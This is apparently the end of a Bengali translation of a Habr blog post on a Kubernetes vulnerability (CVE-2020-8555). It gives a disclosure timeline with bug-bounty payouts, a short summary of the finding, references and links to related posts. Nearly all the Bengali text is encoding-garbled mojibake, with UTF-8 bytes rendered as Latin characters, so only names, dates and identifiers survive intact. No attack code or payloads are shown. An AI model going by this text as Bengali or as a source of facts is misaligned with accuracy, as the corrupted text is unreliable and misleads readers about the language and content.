- āĻāĻžāĻ¨ā§āĻ¯āĻŧāĻžāĻ°ā§ 16, 2020: Kubernetes PSC (āĻĒā§āĻ°ā§āĻĄāĻžāĻā§āĻ āĻ¸āĻŋāĻāĻŋāĻāĻ°āĻŋāĻāĻŋ āĻāĻŽāĻŋāĻāĻŋ) āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻ¸ā§āĻŦā§āĻāĻžāĻ° āĻāĻ°ā§āĻā§ āĻāĻŦāĻ āĻŦāĻŋāĻĒā§āĻ˛ āĻ¸āĻāĻā§āĻ¯āĻ āĻ¸āĻŽā§āĻāĻžāĻŦā§āĻ¯ āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻāĻžāĻ°āĻŖā§ āĻŽāĻžāĻ°ā§āĻā§āĻ° āĻŽāĻžāĻāĻžāĻŽāĻžāĻāĻŋ āĻĒāĻ°ā§āĻ¯āĻ¨ā§āĻ¤ āĻāĻāĻŋ āĻā§āĻĒāĻ¨ āĻ°āĻžāĻāĻ¤ā§ āĻŦāĻ˛ā§āĻā§āĨ¤
- 11 āĻĢā§āĻŦā§āĻ°ā§āĻ¯āĻŧāĻžāĻ°āĻŋ, 2020: Google VRP āĻĒā§āĻ°āĻ¸ā§āĻāĻžāĻ° āĻĒā§āĻ¯āĻŧā§āĻā§āĨ¤
- 4 āĻŽāĻžāĻ°ā§āĻ, 2020: HackerOne-āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻĒā§āĻ°āĻžāĻĒā§āĻ¤ Kubernetes āĻĒā§āĻ°āĻ¸ā§āĻāĻžāĻ°āĨ¤
- āĻŽāĻžāĻ°ā§āĻ 15, 2020: āĻā§āĻāĻŋāĻĄ-ā§§ā§¯ āĻĒāĻ°āĻŋāĻ¸ā§āĻĨāĻŋāĻ¤āĻŋāĻ° āĻāĻžāĻ°āĻŖā§ āĻŽā§āĻ˛āĻ¤ āĻ¨āĻŋāĻ°ā§āĻ§āĻžāĻ°āĻŋāĻ¤ āĻĒāĻžāĻŦāĻ˛āĻŋāĻ āĻĄāĻŋāĻ¸āĻā§āĻ˛ā§āĻāĻžāĻ° āĻ¸ā§āĻĨāĻāĻŋāĻ¤ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§āĨ¤
- āĻā§āĻ¨ 1, 2020: āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ + āĻŽāĻžāĻāĻā§āĻ°ā§āĻ¸āĻĢā§āĻā§āĻ° āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻ¯ā§āĻĨ āĻŦāĻŋāĻŦā§āĻ¤āĻŋāĨ¤
TL; āĻĄāĻŋāĻāĻ°
- āĻāĻŽāĻ°āĻž āĻŦāĻŋāĻ¯āĻŧāĻžāĻ° āĻĒāĻžāĻ¨ āĻāĻ°āĻŋ āĻāĻŦāĻ āĻĒāĻŋāĻāĻž āĻāĻžāĻ :)
- āĻāĻŽāĻ°āĻž Kubernetes-āĻ āĻāĻāĻāĻŋ āĻ āĻ¨ā§āĻ¤āĻ°ā§āĻŽā§āĻā§ āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻāĻŦāĻŋāĻˇā§āĻāĻžāĻ° āĻāĻ°ā§āĻāĻŋ, āĻ¯āĻĻāĻŋāĻ āĻāĻŽāĻžāĻĻā§āĻ° āĻ¤āĻž āĻāĻ°āĻžāĻ° āĻā§āĻ¨ā§ āĻāĻĻā§āĻĻā§āĻļā§āĻ¯ āĻāĻŋāĻ˛ āĻ¨āĻžāĨ¤
- āĻāĻŽāĻ°āĻž āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻā§āĻ˛āĻžāĻāĻĄ āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻā§āĻ˛āĻžāĻ¸ā§āĻāĻžāĻ°āĻā§āĻ˛āĻŋāĻ¤ā§ āĻ āĻ¤āĻŋāĻ°āĻŋāĻā§āĻ¤ āĻŦāĻŋāĻļā§āĻ˛ā§āĻˇāĻŖ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻ¨āĻž āĻāĻ°ā§āĻāĻŋ āĻāĻŦāĻ āĻ āĻ¤āĻŋāĻ°āĻŋāĻā§āĻ¤ āĻĻā§āĻ°ā§āĻĻāĻžāĻ¨ā§āĻ¤ āĻŦā§āĻ¨āĻžāĻ¸ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻžāĻ° āĻāĻžāĻ°āĻŖā§ āĻ¸ā§āĻˇā§āĻ āĻā§āĻˇāĻ¤āĻŋ āĻŦāĻžāĻĄāĻŧāĻžāĻ¤ā§ āĻ¸āĻā§āĻˇāĻŽ āĻšāĻ¯āĻŧā§āĻāĻŋāĨ¤
- āĻāĻĒāĻ¨āĻŋ āĻāĻ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§ā§ āĻĒā§āĻ°āĻā§āĻ° āĻĒā§āĻ°āĻ¯ā§āĻā§āĻ¤āĻŋāĻāĻ¤ āĻŦāĻŋāĻŦāĻ°āĻŖ āĻĒāĻžāĻŦā§āĻ¨āĨ¤ āĻāĻŽāĻ°āĻž āĻ¤āĻžāĻĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻāĻĒāĻ¨āĻžāĻ° āĻ¸āĻžāĻĨā§ āĻāĻ˛ā§āĻāĻ¨āĻž āĻāĻ°āĻ¤ā§ āĻĒā§āĻ°ā§ āĻā§āĻļāĻŋ āĻšāĻŦ (āĻā§āĻāĻāĻžāĻ°:
@āĻ°āĻŋāĻāĻžāĻ°āĻā§āĻ¯āĻžāĻā§āĻ¸ &@__āĻšāĻžāĻ_ ). - āĻĻā§āĻāĻž āĻā§āĻ˛ āĻ¯ā§ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻ§āĻ°āĻŖā§āĻ° āĻāĻ¨ā§āĻˇā§āĻ āĻžāĻ¨āĻŋāĻāĻ¤āĻž āĻāĻŦāĻ āĻ°āĻŋāĻĒā§āĻ°ā§āĻāĻŋāĻ āĻĒā§āĻ°āĻ¤ā§āĻ¯āĻžāĻļāĻžāĻ° āĻā§āĻ¯āĻŧā§ āĻ āĻ¨ā§āĻ āĻŦā§āĻļāĻŋ āĻ¸āĻŽāĻ¯āĻŧ āĻ¨ā§āĻ¯āĻŧāĨ¤
āĻ°ā§āĻĢāĻžāĻ°ā§āĻ¨ā§āĻ¸
-
āĻā§āĻāĻ˛ āĻā§āĻ°ā§āĻĒ kubernetes-āĻ¨āĻŋāĻ°āĻžāĻĒāĻ¤ā§āĻ¤āĻž-āĻā§āĻˇāĻŖāĻž ; -
āĻāĻ¨ā§āĻ¯ CVE-2020-8555 ; -
āĻā§āĻ˛āĻ āĻ¸āĻŽāĻ¸ā§āĻ¯āĻž #30794 ; -
heketi/client/api/go-client/volume.go .
āĻ āĻ¨ā§āĻŦāĻžāĻĻāĻ āĻĨā§āĻā§ PS
āĻāĻŽāĻžāĻĻā§āĻ° āĻŦā§āĻ˛āĻā§āĻ āĻĒāĻĄāĻŧā§āĻ¨:
- ÂĢ
Kubernetes āĻŦāĻžāĻ āĻšāĻžāĻ¨ā§āĻ āĻāĻ¨ā§āĻˇā§āĻ āĻžāĻ¨āĻŋāĻāĻāĻžāĻŦā§ āĻā§āĻ˛āĻž āĻāĻā§ "; - ÂĢ
āĻ˛āĻ āĻŽāĻžāĻāĻ¨ā§āĻ āĻāĻ°ā§ Kubernetes-āĻ āĻāĻāĻāĻŋ āĻĒāĻĄ āĻĨā§āĻā§ āĻĒā§āĻ°āĻ¸ā§āĻĨāĻžāĻ¨ āĻāĻ°āĻž āĻšāĻā§āĻā§ "; - ÂĢ
33+ āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ āĻ¨āĻŋāĻ°āĻžāĻĒāĻ¤ā§āĻ¤āĻž āĻ¸āĻ°āĻā§āĻāĻžāĻŽ Âģ.
āĻāĻ¤ā§āĻ¸: www.habr.com